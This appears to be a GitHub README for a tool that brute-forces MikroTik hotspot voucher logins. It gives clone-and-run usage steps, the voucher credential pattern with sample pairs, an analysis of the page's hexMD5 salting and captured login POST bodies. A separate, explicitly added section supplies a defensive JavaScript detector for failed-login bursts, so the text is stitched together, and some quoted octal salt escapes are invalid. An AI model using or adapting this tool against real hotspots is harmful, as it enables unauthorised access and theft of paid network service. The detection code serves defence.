RomeoMurmu / BruteForce-HOTSPOT-Mikrotik

Brute-force attack against the MikroTik hotspot login. The attack was only tested against 1-hour users; the pattern used for one-month users still needs to be examined.


Brute-force attack login

The attack was only tested against 1-hour users; the pattern used for one-month users still needs to be examined.

How to use this tool?

git clone --depth=1 https://github.com/Juvenal-Yescas/Brute-force-Mikrotik.git

Edit the file conf.json and replace http://localjuve.com with the login page of the hotspot to attack (example: http://hotspotmikrotik.com).

Execute this command.

$ node hck-mikro.js

The data.js file contains the list of possible users and passwords; more users and passwords can be generated using Tools/dig-Generate-File.py.

Analysis


Login

Examples of valid data:

username=1hjtd
password=263


username=1hmtw
password=423


The IP address is this:


How to attack?

The pattern for the username is 1h:

username=1hjtd
password=263

Right-clicking > View source code for this page shows that the values used to create the secure password change in the function doLogin(). This complicates attacking with a direct plain-text POST: the POST must be made with the password already hashed by hexMD5.

document.sendin.password.value = hexMD5('\075' + document.login.password.value + '\532\742\124\412\422\545\965\162\943\173\846\825\842\857\139\184');
document.sendin.password.value = hexMD5('\123' + document.login.password.value + '\624\077\174\275\022\150\314\272\032\201\122\170\154\311\235\102');

Capturing requests with Burp Suite

username=1hjtd&password=6e7651ee150309d7da25cb30329368e2&dst=&popup=true
username=1hjtd&password=9f788a4e692207e71cdffbb921b8f8f1&dst=&popup=true
username=1hjtd&password=9f788a4e692207e71cdffbb921b8f8f1&dst=&popup=true
username=1hjtd&password=1d44ed0532a8d99b41ea8864352d9e59&dst=&popup=true
username=1hjtd&password=99b033a5dbd6ff867c265c05170e0ef1&dst=&popup=true
username=1hjtd&password=9f2611a4b2ff7f42b9e72758aeb28a52&dst=&popup=true
username=1hjtd&password=d62418f1793ab0dec2754a088d21d534&dst=&popup=true
username=1hjtd&password=d62418f1793ab0dec2754a088d21d534&dst=&popup=true
username=1hjtd&password=00cfe5b8e01a385d18a29b459f349823&dst=&popup=true

Note: The password changes every time a request is made.

Post example to attack
username: 1hjtd
password: 00cfe5b8e01a385d18a29b459f349823

Burp Suite capture:

username=1hjtd&password=00cfe5b8e01a385d18a29b459f349823&dst=&popup=true
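
Since the submitted hash changes between requests (see the note above), repeated guesses cannot be matched on the password field, but the rate of failed logins per client still gives them away. The following detector is an added example, not code from this repository; the log layout, field names, thresholds and IP addresses are constructed for illustration and are not RouterOS output.

```javascript
// Added example: sliding-window detector for hotspot login guessing.
// The log layout is constructed for this example; it is not RouterOS output.
const SAMPLE_LOG = [
  // A normal client: one typo, then a successful login.
  '2024-01-01T10:00:00Z src=10.5.50.40 user=1hmtw result=fail',
  '2024-01-01T10:00:20Z src=10.5.50.40 user=1hmtw result=ok',
  // One client failing eight times in eight seconds against two usernames.
  ...Array.from({ length: 8 }, (_, i) =>
    `2024-01-01T10:01:0${i}Z src=10.5.50.23 user=${i % 2 ? '1hmtw' : '1hjtd'} result=fail`),
  // A single late failure from the same client must not extend the burst.
  '2024-01-01T10:30:00Z src=10.5.50.23 user=1hjtd result=fail',
].join('\n');

function parseLine(line) {
  const m = /^(\S+) src=(\S+) user=(\S+) result=(ok|fail)$/.exec(line.trim());
  if (!m || Number.isNaN(Date.parse(m[1]))) return null; // skip malformed lines
  return { ts: Date.parse(m[1]), src: m[2], user: m[3], ok: m[4] === 'ok' };
}

// Flags sources with at least maxFails failed logins inside windowMs.
// Lines are assumed to be in chronological order, as in an append-only log.
function detectGuessing(logText, { windowMs = 60000, maxFails = 5 } = {}) {
  const recent = new Map(); // src -> failures still inside the window
  const alerts = new Map(); // src -> { src, fails, users }
  for (const line of logText.split('\n')) {
    const ev = parseLine(line);
    if (!ev || ev.ok) continue;
    const q = recent.get(ev.src) || [];
    q.push(ev);
    while (ev.ts - q[0].ts > windowMs) q.shift(); // drop failures outside the window
    recent.set(ev.src, q);
    if (q.length < maxFails) continue;
    const a = alerts.get(ev.src) || { src: ev.src, fails: 0, users: [] };
    a.fails = Math.max(a.fails, q.length); // peak failures seen in one window
    a.users = [...new Set([...a.users, ...q.map((e) => e.user)])].sort();
    alerts.set(ev.src, a);
  }
  return [...alerts.values()];
}

console.log(detectGuessing(SAMPLE_LOG));
```

The same counters can drive a temporary block or login delay for the offending client; the thresholds need tuning against how often legitimate users mistype their voucher.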



License: MIT License


Languages

JavaScript 97.8%, Python 2.2%